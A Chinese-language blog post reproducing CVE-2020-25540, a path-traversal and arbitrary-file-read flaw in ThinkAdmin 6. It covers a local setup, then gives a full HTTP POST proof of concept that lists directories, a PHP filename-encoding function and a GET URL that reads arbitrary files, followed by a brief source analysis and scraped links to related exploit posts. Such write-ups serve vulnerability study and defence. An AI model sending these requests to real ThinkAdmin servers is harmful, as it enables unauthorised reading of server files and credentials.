ThinkAdmin漏洞(CVE-2020-25540 )复现
简介
ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统
漏洞概述
ThinkAdmin6版本存在路径遍历漏洞。该漏洞主要是因为api中存在危险函数,没有任何过滤。攻击者可利用该漏洞通过请求编码参数任意读取远程服务器上的任意文件。
影响版本
ThinkAdmin版本小于 ≤ 2020.08.03.01
环境搭建
使用phpstudy进行安装
设置阿里云 Composer 代理
composer config -g repo.packagist composer https://mirrors.aliyun.com/composer
ThinkAdmin下载地址
https://github.com/179776823/ThinkAdmin进入ThinkAdmin目录进行安装
cd ThinkAdmin-6composer install
php进行运行
php think run
http://127.0.0.1:8000打开页面
漏洞复现
列目录
poc
POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=4e3eb8bf4d142b8bc21279a7418eea26
Upgrade-Insecure-Requests: 1
Content-Length: 27
Content-Type: application/x-www-form-urlencodedrules=%5b%22%2e%5c%2f%22%5d
任意文件读取
在根目录新建1.txt文件
使用加密函数对1.txt文件名进行加密
function encode($content){ list($chars, $length) = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))]; for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0); return $chars;}得到数据加密数据1d1a383c38
http://127.0.0.1:8000/admin.html?s=admin/api.Update/get/encode/1d1a383c38
漏洞分析
列目录分析
ThinkAdmin-6\app\admin\controller\api\Update.php文件中
node函数把post传过来的rules给getlist()函数
跳转到getlist函数
循环读取改目录下的所有文件
传个[".\/"]给rules即可获取
任意文件读取分析
ThinkAdmin-6\app\admin\controller\api\Update.php文件中
get函数,解密后读取
根据文件名加密后传入即可获取base64加密的内容,解密即可
ThinkAdmin漏洞(CVE-2020-25540 )复现相关推荐
- 什么是cve什么是cwe_什么是CVE 2020 0601又名Curveball,为何如此危险
什么是cve什么是cwe Monday the 13th of January Brian Krebs published on his blog that he had sources tellin ...
- [系统安全] 八.Windows漏洞利用之CVE-2019-0708复现及防御详解
您可能之前看到过我写的类似文章,为什么还要重复撰写呢?只是想更好地帮助初学者了解病毒逆向分析和系统安全,更加成体系且不破坏之前的系列.因此,我重新开设了这个专栏,准备系统整理和深入学习系统安全.逆向分 ...
- NetLogon特权提升漏洞(CVE-2020-1472)复现及问题解决
NetLogon特权提升漏洞(CVE-2020-1472)复现 漏洞描述 2020年08月12日,Windows官方 发布了 NetLogon 特权提升漏洞 的风险通告,该漏洞编号为 CVE-2020 ...
- 【vulhub】Atlassian Confluence 路径穿越与命令执行漏洞(CVE-2019-3396)复现与反思!
特征 1.8090端口 2.confluence图标(如图所示) 搭建环境 搭建confluence看这4篇教程,该cve搭建是用Confluence Server, 但是tm就是没有Confluen ...
- SSH协议弱加密算法漏洞的利用及复现(中间人攻击)
SSH协议弱加密算法漏洞的利用及复现(中间人攻击) SSH协议弱加密算法漏洞的利用及复现(中间人攻击) 很多服务器或者交换机是存在SSH协议弱加密算法漏洞的,但是该漏洞如何利用呢?最近研究了下此漏洞的 ...
- 〖EXP〗Ladon打印机漏洞提权CVE-2021-1675复现
基本情况 6月9日,微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个Windows Print Spooler权限提升漏洞,漏洞CVE编号:CVE-2021-1675.未经身份验证的远程攻 ...
- php x24 x65 x6d x61,Jboss远程代码执行漏洞CVE:2013-4810获得system权限
此方法成功的渗透至Windows系统并获得最高权限exp 此方法成功的渗透至Windows系统并获得最高权限 exp ?php/*Apache Tomcat/JBoss EJBInvokerServl ...
- wordpress 4.6任意命令执行漏洞(PwnScriptum)复现
今天继续给大家介绍渗透测试相关知识,本文主要内容是wordpress 4.6任意命令执行漏洞(PwnScriptum)复现. 免责声明: 本文所介绍的内容仅做学习交流使用,严禁利用文中技术进行非法行为 ...
- [“第五空间“智能安全大赛 2020] misc 复现
["第五空间"智能安全大赛 2020] misc 复现 loop run philosopher loop 010打开文件发现是zip文件,解压出现tarfile,继续使用tar ...
最新文章
- 面向开发者的2018年AI趋势分析
- const关键字的作用?
- Mysql之group by 和order by 一起用时的排序问题(亲测)
- 【2017-02-20】C#基础 - 运算符//表格,示例,代码巩固练习
- 每个电脑都会自己的SID号和GUID号,而且不会相同。。
- Tomcat 7 的七大新特性
- Cold Diffusion: Inverting Arbitrary Image Transforms Without Noise【重点笔记】
- 计算机的睡眠和休眠设置密码,怎么设置笔记本电脑睡眠唤醒密码
- IBM JDK官方下载地址
- ubuntu 19.04源
- C语言switch语句无break
- 包干到户是最好的软件项目管理方法
- 【deepin】安装与设置win10独立双系统 - 战神Z7-SL7S3安装deepin15.11,并双屏显示
- 可用主机ip地址数量的计算
- OSChina 周日乱弹 ——会爬墙的不仅仅是壁虎还有班主任
- 免打扰时间设置_我的视频设置是什么样的,为什么要打扰我
- 广域网技术——SR技术概括
- stm32h7 串口idle_【STM32H7教程】第29章 STM32H7的USART串口基础知识和HAL库API
- WIN7/XP双主分区独立双系统的引导教程
- [中英对照]User-Space Device Drivers in Linux: A First Look | 初识Linux用户态设备驱动程序...